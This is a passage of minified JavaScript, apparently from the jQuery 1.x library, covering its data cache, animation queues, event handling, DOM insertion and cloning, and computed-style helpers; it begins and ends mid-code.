").toLowerCase()],c=+a.nodeType||1;return 1!==c&&9!==c?!1:!b||b!==!0&&a.getAttribute("classid")===b};var M=/^(?:\{[\w\W]*\}|\[[\w\W]*\])$/,N=/([A-Z])/g;function O(a,b,c){if(void 0===c&&1===a.nodeType){var d="data-"+b.replace(N,"-$1").toLowerCase();if(c=a.getAttribute(d),"string"==typeof c){try{c="true"===c?!0:"false"===c?!1:"null"===c?null:+c+""===c?+c:M.test(c)?m.parseJSON(c):c}catch(e){}m.data(a,b,c)}else c=void 0}return c}function P(a){var b;for(b in a)if(("data"!==b||!m.isEmptyObject(a[b]))&&"toJSON"!==b)return!1;return!0}function Q(a,b,d,e){if(m.acceptData(a)){var f,g,h=m.expando,i=a.nodeType,j=i?m.cache:a,k=i?a[h]:a[h]&&h;
-    if(k&&j[k]&&(e||j[k].data)||void 0!==d||"string"!=typeof b)return k||(k=i?a[h]=c.pop()||m.guid++:h),j[k]||(j[k]=i?{}:{toJSON:m.noop}),("object"==typeof b||"function"==typeof b)&&(e?j[k]=m.extend(j[k],b):j[k].data=m.extend(j[k].data,b)),g=j[k],e||(g.data||(g.data={}),g=g.data),void 0!==d&&(g[m.camelCase(b)]=d),"string"==typeof b?(f=g[b],null==f&&(f=g[m.camelCase(b)])):f=g,f}}function R(a,b,c){if(m.acceptData(a)){var d,e,f=a.nodeType,g=f?m.cache:a,h=f?a[m.expando]:m.expando;if(g[h]){if(b&&(d=c?g[h]:g[h].data)){m.isArray(b)?b=b.concat(m.map(b,m.camelCase)):b in d?b=[b]:(b=m.camelCase(b),b=b in d?[b]:b.split(" ")),e=b.length;while(e--)delete d[b[e]];if(c?!P(d):!m.isEmptyObject(d))return}(c||(delete g[h].data,P(g[h])))&&(f?m.cleanData([a],!0):k.deleteExpando||g!=g.window?delete g[h]:g[h]=null)}}}m.extend({cache:{},noData:{"applet ":!0,"embed ":!0,"object ":"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"},hasData:function(a){return a=a.nodeType?m.cache[a[m.expando]]:a[m.expando],!!a&&!P(a)},data:function(a,b,c){return Q(a,b,c)},removeData:function(a,b){return R(a,b)},_data:function(a,b,c){return Q(a,b,c,!0)},_removeData:function(a,b){return R(a,b,!0)}}),m.fn.extend({data:function(a,b){var c,d,e,f=this[0],g=f&&f.attributes;if(void 0===a){if(this.length&&(e=m.data(f),1===f.nodeType&&!m._data(f,"parsedAttrs"))){c=g.length;while(c--)g[c]&&(d=g[c].name,0===d.indexOf("data-")&&(d=m.camelCase(d.slice(5)),O(f,d,e[d])));m._data(f,"parsedAttrs",!0)}return e}return"object"==typeof a?this.each(function(){m.data(this,a)}):arguments.length>1?this.each(function(){m.data(this,a,b)}):f?O(f,a,m.data(f,a)):void 0},removeData:function(a){return this.each(function(){m.removeData(this,a)})}}),m.extend({queue:function(a,b,c){var d;return a?(b=(b||"fx")+"queue",d=m._data(a,b),c&&(!d||m.isArray(c)?d=m._data(a,b,m.makeArray(c)):d.push(c)),d||[]):void 0},dequeue:function(a,b){b=b||"fx";var c=m.queue(a,b),d=c.length,e=c.shift(),f=m._queueHooks(a,b),g=function(){m.dequeue(a,b)};"inprogress"===e&&(e=c.shift(),d--),e&&("fx"===b&&c.unshift("inprogress"),delete f.stop,e.call(a,g,f)),!d&&f&&f.empty.fire()},_queueHooks:function(a,b){var c=b+"queueHooks";return m._data(a,c)||m._data(a,c,{empty:m.Callbacks("once memory").add(function(){m._removeData(a,b+"queue"),m._removeData(a,c)})})}}),m.fn.extend({queue:function(a,b){var c=2;return"string"!=typeof a&&(b=a,a="fx",c--),arguments.length<c?m.queue(this[0],a):void 0===b?this:this.each(function(){var c=m.queue(this,a,b);m._queueHooks(this,a),"fx"===a&&"inprogress"!==c[0]&&m.dequeue(this,a)})},dequeue:function(a){return this.each(function(){m.dequeue(this,a)})},clearQueue:function(a){return this.queue(a||"fx",[])},promise:function(a,b){var c,d=1,e=m.Deferred(),f=this,g=this.length,h=function(){--d||e.resolveWith(f,[f])};"string"!=typeof a&&(b=a,a=void 0),a=a||"fx";while(g--)c=m._data(f[g],a+"queueHooks"),c&&c.empty&&(d++,c.empty.add(h));return h(),e.promise(b)}});var S=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,T=["Top","Right","Bottom","Left"],U=function(a,b){return a=b||a,"none"===m.css(a,"display")||!m.contains(a.ownerDocument,a)},V=m.access=function(a,b,c,d,e,f,g){var h=0,i=a.length,j=null==c;if("object"===m.type(c)){e=!0;for(h in c)m.access(a,b,h,c[h],!0,f,g)}else if(void 0!==d&&(e=!0,m.isFunction(d)||(g=!0),j&&(g?(b.call(a,d),b=null):(j=b,b=function(a,b,c){return j.call(m(a),c)})),b))for(;i>h;h++)b(a[h],c,g?d:d.call(a[h],h,b(a[h],c)));return e?a:j?b.call(a):i?b(a[0],c):f},W=/^(?:checkbox|radio)$/i;!function(){var a=y.createElement("input"),b=y.createElement("div"),c=y.createDocumentFragment();if(b.innerHTML="  <link/><table></table><a href='/a'>a</a><input type='checkbox'/>",k.leadingWhitespace=3===b.firstChild.nodeType,k.tbody=!b.getElementsByTagName("tbody").length,k.htmlSerialize=!!b.getElementsByTagName("link").length,k.html5Clone="<:nav></:nav>"!==y.createElement("nav").cloneNode(!0).outerHTML,a.type="checkbox",a.checked=!0,c.appendChild(a),k.appendChecked=a.checked,b.innerHTML="<textarea>x</textarea>",k.noCloneChecked=!!b.cloneNode(!0).lastChild.defaultValue,c.appendChild(b),b.innerHTML="<input type='radio' checked='checked' name='t'/>",k.checkClone=b.cloneNode(!0).cloneNode(!0).lastChild.checked,k.noCloneEvent=!0,b.attachEvent&&(b.attachEvent("onclick",function(){k.noCloneEvent=!1}),b.cloneNode(!0).click()),null==k.deleteExpando){k.deleteExpando=!0;try{delete b.test}catch(d){k.deleteExpando=!1}}}(),function(){var b,c,d=y.createElement("div");for(b in{submit:!0,change:!0,focusin:!0})c="on"+b,(k[b+"Bubbles"]=c in a)||(d.setAttribute(c,"t"),k[b+"Bubbles"]=d.attributes[c].expando===!1);d=null}();var X=/^(?:input|select|textarea)$/i,Y=/^key/,Z=/^(?:mouse|pointer|contextmenu)|click/,$=/^(?:focusinfocus|focusoutblur)$/,_=/^([^.]*)(?:\.(.+)|)$/;function ab(){return!0}function bb(){return!1}function cb(){try{return y.activeElement}catch(a){}}m.event={global:{},add:function(a,b,c,d,e){var f,g,h,i,j,k,l,n,o,p,q,r=m._data(a);if(r){c.handler&&(i=c,c=i.handler,e=i.selector),c.guid||(c.guid=m.guid++),(g=r.events)||(g=r.events={}),(k=r.handle)||(k=r.handle=function(a){return typeof m===K||a&&m.event.triggered===a.type?void 0:m.event.dispatch.apply(k.elem,arguments)},k.elem=a),b=(b||"").match(E)||[""],h=b.length;while(h--)f=_.exec(b[h])||[],o=q=f[1],p=(f[2]||"").split(".").sort(),o&&(j=m.event.special[o]||{},o=(e?j.delegateType:j.bindType)||o,j=m.event.special[o]||{},l=m.extend({type:o,origType:q,data:d,handler:c,guid:c.guid,selector:e,needsContext:e&&m.expr.match.needsContext.test(e),namespace:p.join(".")},i),(n=g[o])||(n=g[o]=[],n.delegateCount=0,j.setup&&j.setup.call(a,d,p,k)!==!1||(a.addEventListener?a.addEventListener(o,k,!1):a.attachEvent&&a.attachEvent("on"+o,k))),j.add&&(j.add.call(a,l),l.handler.guid||(l.handler.guid=c.guid)),e?n.splice(n.delegateCount++,0,l):n.push(l),m.event.global[o]=!0);a=null}},remove:function(a,b,c,d,e){var f,g,h,i,j,k,l,n,o,p,q,r=m.hasData(a)&&m._data(a);if(r&&(k=r.events)){b=(b||"").match(E)||[""],j=b.length;while(j--)if(h=_.exec(b[j])||[],o=q=h[1],p=(h[2]||"").split(".").sort(),o){l=m.event.special[o]||{},o=(d?l.delegateType:l.bindType)||o,n=k[o]||[],h=h[2]&&new RegExp("(^|\\.)"+p.join("\\.(?:.*\\.|)")+"(\\.|$)"),i=f=n.length;while(f--)g=n[f],!e&&q!==g.origType||c&&c.guid!==g.guid||h&&!h.test(g.namespace)||d&&d!==g.selector&&("**"!==d||!g.selector)||(n.splice(f,1),g.selector&&n.delegateCount--,l.remove&&l.remove.call(a,g));i&&!n.length&&(l.teardown&&l.teardown.call(a,p,r.handle)!==!1||m.removeEvent(a,o,r.handle),delete k[o])}else for(o in k)m.event.remove(a,o+b[j],c,d,!0);m.isEmptyObject(k)&&(delete r.handle,m._removeData(a,"events"))}},trigger:function(b,c,d,e){var f,g,h,i,k,l,n,o=[d||y],p=j.call(b,"type")?b.type:b,q=j.call(b,"namespace")?b.namespace.split("."):[];if(h=l=d=d||y,3!==d.nodeType&&8!==d.nodeType&&!$.test(p+m.event.triggered)&&(p.indexOf(".")>=0&&(q=p.split("."),p=q.shift(),q.sort()),g=p.indexOf(":")<0&&"on"+p,b=b[m.expando]?b:new m.Event(p,"object"==typeof b&&b),b.isTrigger=e?2:3,b.namespace=q.join("."),b.namespace_re=b.namespace?new RegExp("(^|\\.)"+q.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,b.result=void 0,b.target||(b.target=d),c=null==c?[b]:m.makeArray(c,[b]),k=m.event.special[p]||{},e||!k.trigger||k.trigger.apply(d,c)!==!1)){if(!e&&!k.noBubble&&!m.isWindow(d)){for(i=k.delegateType||p,$.test(i+p)||(h=h.parentNode);h;h=h.parentNode)o.push(h),l=h;l===(d.ownerDocument||y)&&o.push(l.defaultView||l.parentWindow||a)}n=0;while((h=o[n++])&&!b.isPropagationStopped())b.type=n>1?i:k.bindType||p,f=(m._data(h,"events")||{})[b.type]&&m._data(h,"handle"),f&&f.apply(h,c),f=g&&h[g],f&&f.apply&&m.acceptData(h)&&(b.result=f.apply(h,c),b.result===!1&&b.preventDefault());if(b.type=p,!e&&!b.isDefaultPrevented()&&(!k._default||k._default.apply(o.pop(),c)===!1)&&m.acceptData(d)&&g&&d[p]&&!m.isWindow(d)){l=d[g],l&&(d[g]=null),m.event.triggered=p;try{d[p]()}catch(r){}m.event.triggered=void 0,l&&(d[g]=l)}return b.result}},dispatch:function(a){a=m.event.fix(a);var b,c,e,f,g,h=[],i=d.call(arguments),j=(m._data(this,"events")||{})[a.type]||[],k=m.event.special[a.type]||{};if(i[0]=a,a.delegateTarget=this,!k.preDispatch||k.preDispatch.call(this,a)!==!1){h=m.event.handlers.call(this,a,j),b=0;while((f=h[b++])&&!a.isPropagationStopped()){a.currentTarget=f.elem,g=0;while((e=f.handlers[g++])&&!a.isImmediatePropagationStopped())(!a.namespace_re||a.namespace_re.test(e.namespace))&&(a.handleObj=e,a.data=e.data,c=((m.event.special[e.origType]||{}).handle||e.handler).apply(f.elem,i),void 0!==c&&(a.result=c)===!1&&(a.preventDefault(),a.stopPropagation()))}return k.postDispatch&&k.postDispatch.call(this,a),a.result}},handlers:function(a,b){var c,d,e,f,g=[],h=b.delegateCount,i=a.target;if(h&&i.nodeType&&(!a.button||"click"!==a.type))for(;i!=this;i=i.parentNode||this)if(1===i.nodeType&&(i.disabled!==!0||"click"!==a.type)){for(e=[],f=0;h>f;f++)d=b[f],c=d.selector+" ",void 0===e[c]&&(e[c]=d.needsContext?m(c,this).index(i)>=0:m.find(c,this,null,[i]).length),e[c]&&e.push(d);e.length&&g.push({elem:i,handlers:e})}return h<b.length&&g.push({elem:this,handlers:b.slice(h)}),g},fix:function(a){if(a[m.expando])return a;var b,c,d,e=a.type,f=a,g=this.fixHooks[e];g||(this.fixHooks[e]=g=Z.test(e)?this.mouseHooks:Y.test(e)?this.keyHooks:{}),d=g.props?this.props.concat(g.props):this.props,a=new m.Event(f),b=d.length;while(b--)c=d[b],a[c]=f[c];return a.target||(a.target=f.srcElement||y),3===a.target.nodeType&&(a.target=a.target.parentNode),a.metaKey=!!a.metaKey,g.filter?g.filter(a,f):a},props:"altKey bubbles cancelable ctrlKey currentTarget eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),fixHooks:{},keyHooks:{props:"char charCode key keyCode".split(" "),filter:function(a,b){return null==a.which&&(a.which=null!=b.charCode?b.charCode:b.keyCode),a}},mouseHooks:{props:"button buttons clientX clientY fromElement offsetX offsetY pageX pageY screenX screenY toElement".split(" "),filter:function(a,b){var c,d,e,f=b.button,g=b.fromElement;return null==a.pageX&&null!=b.clientX&&(d=a.target.ownerDocument||y,e=d.documentElement,c=d.body,a.pageX=b.clientX+(e&&e.scrollLeft||c&&c.scrollLeft||0)-(e&&e.clientLeft||c&&c.clientLeft||0),a.pageY=b.clientY+(e&&e.scrollTop||c&&c.scrollTop||0)-(e&&e.clientTop||c&&c.clientTop||0)),!a.relatedTarget&&g&&(a.relatedTarget=g===a.target?b.toElement:g),a.which||void 0===f||(a.which=1&f?1:2&f?3:4&f?2:0),a}},special:{load:{noBubble:!0},focus:{trigger:function(){if(this!==cb()&&this.focus)try{return this.focus(),!1}catch(a){}},delegateType:"focusin"},blur:{trigger:function(){return this===cb()&&this.blur?(this.blur(),!1):void 0},delegateType:"focusout"},click:{trigger:function(){return m.nodeName(this,"input")&&"checkbox"===this.type&&this.click?(this.click(),!1):void 0},_default:function(a){return m.nodeName(a.target,"a")}},beforeunload:{postDispatch:function(a){void 0!==a.result&&a.originalEvent&&(a.originalEvent.returnValue=a.result)}}},simulate:function(a,b,c,d){var e=m.extend(new m.Event,c,{type:a,isSimulated:!0,originalEvent:{}});d?m.event.trigger(e,null,b):m.event.dispatch.call(b,e),e.isDefaultPrevented()&&c.preventDefault()}},m.removeEvent=y.removeEventListener?function(a,b,c){a.removeEventListener&&a.removeEventListener(b,c,!1)}:function(a,b,c){var d="on"+b;a.detachEvent&&(typeof a[d]===K&&(a[d]=null),a.detachEvent(d,c))},m.Event=function(a,b){return this instanceof m.Event?(a&&a.type?(this.originalEvent=a,this.type=a.type,this.isDefaultPrevented=a.defaultPrevented||void 0===a.defaultPrevented&&a.returnValue===!1?ab:bb):this.type=a,b&&m.extend(this,b),this.timeStamp=a&&a.timeStamp||m.now(),void(this[m.expando]=!0)):new m.Event(a,b)},m.Event.prototype={isDefaultPrevented:bb,isPropagationStopped:bb,isImmediatePropagationStopped:bb,preventDefault:function(){var a=this.originalEvent;this.isDefaultPrevented=ab,a&&(a.preventDefault?a.preventDefault():a.returnValue=!1)},stopPropagation:function(){var a=this.originalEvent;this.isPropagationStopped=ab,a&&(a.stopPropagation&&a.stopPropagation(),a.cancelBubble=!0)},stopImmediatePropagation:function(){var a=this.originalEvent;this.isImmediatePropagationStopped=ab,a&&a.stopImmediatePropagation&&a.stopImmediatePropagation(),this.stopPropagation()}},m.each({mouseenter:"mouseover",mouseleave:"mouseout",pointerenter:"pointerover",pointerleave:"pointerout"},function(a,b){m.event.special[a]={delegateType:b,bindType:b,handle:function(a){var c,d=this,e=a.relatedTarget,f=a.handleObj;return(!e||e!==d&&!m.contains(d,e))&&(a.type=f.origType,c=f.handler.apply(this,arguments),a.type=b),c}}}),k.submitBubbles||(m.event.special.submit={setup:function(){return m.nodeName(this,"form")?!1:void m.event.add(this,"click._submit keypress._submit",function(a){var b=a.target,c=m.nodeName(b,"input")||m.nodeName(b,"button")?b.form:void 0;c&&!m._data(c,"submitBubbles")&&(m.event.add(c,"submit._submit",function(a){a._submit_bubble=!0}),m._data(c,"submitBubbles",!0))})},postDispatch:function(a){a._submit_bubble&&(delete a._submit_bubble,this.parentNode&&!a.isTrigger&&m.event.simulate("submit",this.parentNode,a,!0))},teardown:function(){return m.nodeName(this,"form")?!1:void m.event.remove(this,"._submit")}}),k.changeBubbles||(m.event.special.change={setup:function(){return X.test(this.nodeName)?(("checkbox"===this.type||"radio"===this.type)&&(m.event.add(this,"propertychange._change",function(a){"checked"===a.originalEvent.propertyName&&(this._just_changed=!0)}),m.event.add(this,"click._change",function(a){this._just_changed&&!a.isTrigger&&(this._just_changed=!1),m.event.simulate("change",this,a,!0)})),!1):void m.event.add(this,"beforeactivate._change",function(a){var b=a.target;X.test(b.nodeName)&&!m._data(b,"changeBubbles")&&(m.event.add(b,"change._change",function(a){!this.parentNode||a.isSimulated||a.isTrigger||m.event.simulate("change",this.parentNode,a,!0)}),m._data(b,"changeBubbles",!0))})},handle:function(a){var b=a.target;return this!==b||a.isSimulated||a.isTrigger||"radio"!==b.type&&"checkbox"!==b.type?a.handleObj.handler.apply(this,arguments):void 0},teardown:function(){return m.event.remove(this,"._change"),!X.test(this.nodeName)}}),k.focusinBubbles||m.each({focus:"focusin",blur:"focusout"},function(a,b){var c=function(a){m.event.simulate(b,a.target,m.event.fix(a),!0)};m.event.special[b]={setup:function(){var d=this.ownerDocument||this,e=m._data(d,b);e||d.addEventListener(a,c,!0),m._data(d,b,(e||0)+1)},teardown:function(){var d=this.ownerDocument||this,e=m._data(d,b)-1;e?m._data(d,b,e):(d.removeEventListener(a,c,!0),m._removeData(d,b))}}}),m.fn.extend({on:function(a,b,c,d,e){var f,g;if("object"==typeof a){"string"!=typeof b&&(c=c||b,b=void 0);for(f in a)this.on(f,b,c,a[f],e);return this}if(null==c&&null==d?(d=b,c=b=void 0):null==d&&("string"==typeof b?(d=c,c=void 0):(d=c,c=b,b=void 0)),d===!1)d=bb;else if(!d)return this;return 1===e&&(g=d,d=function(a){return m().off(a),g.apply(this,arguments)},d.guid=g.guid||(g.guid=m.guid++)),this.each(function(){m.event.add(this,a,d,c,b)})},one:function(a,b,c,d){return this.on(a,b,c,d,1)},off:function(a,b,c){var d,e;if(a&&a.preventDefault&&a.handleObj)return d=a.handleObj,m(a.delegateTarget).off(d.namespace?d.origType+"."+d.namespace:d.origType,d.selector,d.handler),this;if("object"==typeof a){for(e in a)this.off(e,b,a[e]);return this}return(b===!1||"function"==typeof b)&&(c=b,b=void 0),c===!1&&(c=bb),this.each(function(){m.event.remove(this,a,c,b)})},trigger:function(a,b){return this.each(function(){m.event.trigger(a,b,this)})},triggerHandler:function(a,b){var c=this[0];return c?m.event.trigger(a,b,c,!0):void 0}});function db(a){var b=eb.split("|"),c=a.createDocumentFragment();if(c.createElement)while(b.length)c.createElement(b.pop());return c}var eb="abbr|article|aside|audio|bdi|canvas|data|datalist|details|figcaption|figure|footer|header|hgroup|mark|meter|nav|output|progress|section|summary|time|video",fb=/ jQuery\d+="(?:null|\d+)"/g,gb=new RegExp("<(?:"+eb+")[\\s/>]","i"),hb=/^\s+/,ib=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,jb=/<([\w:]+)/,kb=/<tbody/i,lb=/<|&#?\w+;/,mb=/<(?:script|style|link)/i,nb=/checked\s*(?:[^=]|=\s*.checked.)/i,ob=/^$|\/(?:java|ecma)script/i,pb=/^true\/(.*)/,qb=/^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g,rb={option:[1,"<select multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],area:[1,"<map>","</map>"],param:[1,"<object>","</object>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],_default:k.htmlSerialize?[0,"",""]:[1,"X<div>","</div>"]},sb=db(y),tb=sb.appendChild(y.createElement("div"));rb.optgroup=rb.option,rb.tbody=rb.tfoot=rb.colgroup=rb.caption=rb.thead,rb.th=rb.td;function ub(a,b){var c,d,e=0,f=typeof a.getElementsByTagName!==K?a.getElementsByTagName(b||"*"):typeof a.querySelectorAll!==K?a.querySelectorAll(b||"*"):void 0;if(!f)for(f=[],c=a.childNodes||a;null!=(d=c[e]);e++)!b||m.nodeName(d,b)?f.push(d):m.merge(f,ub(d,b));return void 0===b||b&&m.nodeName(a,b)?m.merge([a],f):f}function vb(a){W.test(a.type)&&(a.defaultChecked=a.checked)}function wb(a,b){return m.nodeName(a,"table")&&m.nodeName(11!==b.nodeType?b:b.firstChild,"tr")?a.getElementsByTagName("tbody")[0]||a.appendChild(a.ownerDocument.createElement("tbody")):a}function xb(a){return a.type=(null!==m.find.attr(a,"type"))+"/"+a.type,a}function yb(a){var b=pb.exec(a.type);return b?a.type=b[1]:a.removeAttribute("type"),a}function zb(a,b){for(var c,d=0;null!=(c=a[d]);d++)m._data(c,"globalEval",!b||m._data(b[d],"globalEval"))}function Ab(a,b){if(1===b.nodeType&&m.hasData(a)){var c,d,e,f=m._data(a),g=m._data(b,f),h=f.events;if(h){delete g.handle,g.events={};for(c in h)for(d=0,e=h[c].length;e>d;d++)m.event.add(b,c,h[c][d])}g.data&&(g.data=m.extend({},g.data))}}function Bb(a,b){var c,d,e;if(1===b.nodeType){if(c=b.nodeName.toLowerCase(),!k.noCloneEvent&&b[m.expando]){e=m._data(b);for(d in e.events)m.removeEvent(b,d,e.handle);b.removeAttribute(m.expando)}"script"===c&&b.text!==a.text?(xb(b).text=a.text,yb(b)):"object"===c?(b.parentNode&&(b.outerHTML=a.outerHTML),k.html5Clone&&a.innerHTML&&!m.trim(b.innerHTML)&&(b.innerHTML=a.innerHTML)):"input"===c&&W.test(a.type)?(b.defaultChecked=b.checked=a.checked,b.value!==a.value&&(b.value=a.value)):"option"===c?b.defaultSelected=b.selected=a.defaultSelected:("input"===c||"textarea"===c)&&(b.defaultValue=a.defaultValue)}}m.extend({clone:function(a,b,c){var d,e,f,g,h,i=m.contains(a.ownerDocument,a);if(k.html5Clone||m.isXMLDoc(a)||!gb.test("<"+a.nodeName+">")?f=a.cloneNode(!0):(tb.innerHTML=a.outerHTML,tb.removeChild(f=tb.firstChild)),!(k.noCloneEvent&&k.noCloneChecked||1!==a.nodeType&&11!==a.nodeType||m.isXMLDoc(a)))for(d=ub(f),h=ub(a),g=0;null!=(e=h[g]);++g)d[g]&&Bb(e,d[g]);if(b)if(c)for(h=h||ub(a),d=d||ub(f),g=0;null!=(e=h[g]);g++)Ab(e,d[g]);else Ab(a,f);return d=ub(f,"script"),d.length>0&&zb(d,!i&&ub(a,"script")),d=h=e=null,f},buildFragment:function(a,b,c,d){for(var e,f,g,h,i,j,l,n=a.length,o=db(b),p=[],q=0;n>q;q++)if(f=a[q],f||0===f)if("object"===m.type(f))m.merge(p,f.nodeType?[f]:f);else if(lb.test(f)){h=h||o.appendChild(b.createElement("div")),i=(jb.exec(f)||["",""])[1].toLowerCase(),l=rb[i]||rb._default,h.innerHTML=l[1]+f.replace(ib,"<$1></$2>")+l[2],e=l[0];while(e--)h=h.lastChild;if(!k.leadingWhitespace&&hb.test(f)&&p.push(b.createTextNode(hb.exec(f)[0])),!k.tbody){f="table"!==i||kb.test(f)?"<table>"!==l[1]||kb.test(f)?0:h:h.firstChild,e=f&&f.childNodes.length;while(e--)m.nodeName(j=f.childNodes[e],"tbody")&&!j.childNodes.length&&f.removeChild(j)}m.merge(p,h.childNodes),h.textContent="";while(h.firstChild)h.removeChild(h.firstChild);h=o.lastChild}else p.push(b.createTextNode(f));h&&o.removeChild(h),k.appendChecked||m.grep(ub(p,"input"),vb),q=0;while(f=p[q++])if((!d||-1===m.inArray(f,d))&&(g=m.contains(f.ownerDocument,f),h=ub(o.appendChild(f),"script"),g&&zb(h),c)){e=0;while(f=h[e++])ob.test(f.type||"")&&c.push(f)}return h=null,o},cleanData:function(a,b){for(var d,e,f,g,h=0,i=m.expando,j=m.cache,l=k.deleteExpando,n=m.event.special;null!=(d=a[h]);h++)if((b||m.acceptData(d))&&(f=d[i],g=f&&j[f])){if(g.events)for(e in g.events)n[e]?m.event.remove(d,e):m.removeEvent(d,e,g.handle);j[f]&&(delete j[f],l?delete d[i]:typeof d.removeAttribute!==K?d.removeAttribute(i):d[i]=null,c.push(f))}}}),m.fn.extend({text:function(a){return V(this,function(a){return void 0===a?m.text(this):this.empty().append((this[0]&&this[0].ownerDocument||y).createTextNode(a))},null,a,arguments.length)},append:function(){return this.domManip(arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=wb(this,a);b.appendChild(a)}})},prepend:function(){return this.domManip(arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=wb(this,a);b.insertBefore(a,b.firstChild)}})},before:function(){return this.domManip(arguments,function(a){this.parentNode&&this.parentNode.insertBefore(a,this)})},after:function(){return this.domManip(arguments,function(a){this.parentNode&&this.parentNode.insertBefore(a,this.nextSibling)})},remove:function(a,b){for(var c,d=a?m.filter(a,this):this,e=0;null!=(c=d[e]);e++)b||1!==c.nodeType||m.cleanData(ub(c)),c.parentNode&&(b&&m.contains(c.ownerDocument,c)&&zb(ub(c,"script")),c.parentNode.removeChild(c));return this},empty:function(){for(var a,b=0;null!=(a=this[b]);b++){1===a.nodeType&&m.cleanData(ub(a,!1));while(a.firstChild)a.removeChild(a.firstChild);a.options&&m.nodeName(a,"select")&&(a.options.length=0)}return this},clone:function(a,b){return a=null==a?!1:a,b=null==b?a:b,this.map(function(){return m.clone(this,a,b)})},html:function(a){return V(this,function(a){var b=this[0]||{},c=0,d=this.length;if(void 0===a)return 1===b.nodeType?b.innerHTML.replace(fb,""):void 0;if(!("string"!=typeof a||mb.test(a)||!k.htmlSerialize&&gb.test(a)||!k.leadingWhitespace&&hb.test(a)||rb[(jb.exec(a)||["",""])[1].toLowerCase()])){a=a.replace(ib,"<$1></$2>");try{for(;d>c;c++)b=this[c]||{},1===b.nodeType&&(m.cleanData(ub(b,!1)),b.innerHTML=a);b=0}catch(e){}}b&&this.empty().append(a)},null,a,arguments.length)},replaceWith:function(){var a=arguments[0];return this.domManip(arguments,function(b){a=this.parentNode,m.cleanData(ub(this)),a&&a.replaceChild(b,this)}),a&&(a.length||a.nodeType)?this:this.remove()},detach:function(a){return this.remove(a,!0)},domManip:function(a,b){a=e.apply([],a);var c,d,f,g,h,i,j=0,l=this.length,n=this,o=l-1,p=a[0],q=m.isFunction(p);if(q||l>1&&"string"==typeof p&&!k.checkClone&&nb.test(p))return this.each(function(c){var d=n.eq(c);q&&(a[0]=p.call(this,c,d.html())),d.domManip(a,b)});if(l&&(i=m.buildFragment(a,this[0].ownerDocument,!1,this),c=i.firstChild,1===i.childNodes.length&&(i=c),c)){for(g=m.map(ub(i,"script"),xb),f=g.length;l>j;j++)d=i,j!==o&&(d=m.clone(d,!0,!0),f&&m.merge(g,ub(d,"script"))),b.call(this[j],d,j);if(f)for(h=g[g.length-1].ownerDocument,m.map(g,yb),j=0;f>j;j++)d=g[j],ob.test(d.type||"")&&!m._data(d,"globalEval")&&m.contains(h,d)&&(d.src?m._evalUrl&&m._evalUrl(d.src):m.globalEval((d.text||d.textContent||d.innerHTML||"").replace(qb,"")));i=c=null}return this}}),m.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(a,b){m.fn[a]=function(a){for(var c,d=0,e=[],g=m(a),h=g.length-1;h>=d;d++)c=d===h?this:this.clone(!0),m(g[d])[b](c),f.apply(e,c.get());return this.pushStack(e)}});var Cb,Db={};function Eb(b,c){var d,e=m(c.createElement(b)).appendTo(c.body),f=a.getDefaultComputedStyle&&(d=a.getDefaultComputedStyle(e[0]))?d.display:m.css(e[0],"display");return e.detach(),f}function Fb(a){var b=y,c=Db[a];return c||(c=Eb(a,b),"none"!==c&&c||(Cb=(Cb||m("<iframe frameborder='0' width='0' height='0'/>")).appendTo(b.documentElement),b=(Cb[0].contentWindow||Cb[0].contentDocument).document,b.write(),b.close(),c=Eb(a,b),Cb.detach()),Db[a]=c),c}!function(){var a;k.shrinkWrapBlocks=function(){if(null!=a)return a;a=!1;var b,c,d;return c=y.getElementsByTagName("body")[0],c&&c.style?(b=y.createElement("div"),d=y.createElement("div"),d.style.cssText="position:absolute;border:0;width:0;height:0;top:0;left:-9999px",c.appendChild(d).appendChild(b),typeof b.style.zoom!==K&&(b.style.cssText="-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;display:block;margin:0;border:0;padding:1px;width:1px;zoom:1",b.appendChild(y.createElement("div")).style.width="5px",a=3!==b.offsetWidth),c.removeChild(d),a):void 0}}();var Gb=/^margin/,Hb=new RegExp("^("+S+")(?!px)[a-z%]+$","i"),Ib,Jb,Kb=/^(top|right|bottom|left)$/;a.getComputedStyle?(Ib=function(a){return a.ownerDocument.defaultView.getComputedStyle(a,null)},Jb=function(a,b,c){var d,e,f,g,h=a.style;return c=c||Ib(a),g=c?c.getPropertyValue(b)||c[b]:void 0,c&&(""!==g||m.contains(a.ownerDocument,a)||(g=m.style(a,b)),Hb.test(g)&&Gb.test(b)&&(d=h.width,e=h.minWidth,f=h.maxWidth,h.minWidth=h.maxWidth=h.width=g,g=c.width,h.width=d,h.minWidth=e,h.maxWidth=f)),void 0===g?g:g+""}):y.documentElement.currentStyle&&(Ib=function(a){return a.currentStyle},Jb=function(a,b,c){var d,e,f,g,h=a.style;return c=c||Ib(a),g=c?c[b]:void 0,null==g&&h&&h[b]&&(g=h[b]),Hb.test(g)&&!Kb.test(b)&&(d=h.left,e=a.runtimeStyle,f=e&&e.left,f&&(e.left=a.currentStyle.left),h.left="fontSize"===b?"1em":g,g=h.pixelLeft+"px",h.left=d,f&&(e.left=f)),void 0===g?g:g+""||"auto"});function Lb(a,b){return{get:function(){var c=a();if(null!=c)return c?void delete this.get:(this.get=b).apply(this,arguments)}}}!function(){var b,c,d,e,f,g,h;if(b=y.createElement("div"),b.innerHTML="  <link/><table></table><a href='/a'>a</a><input 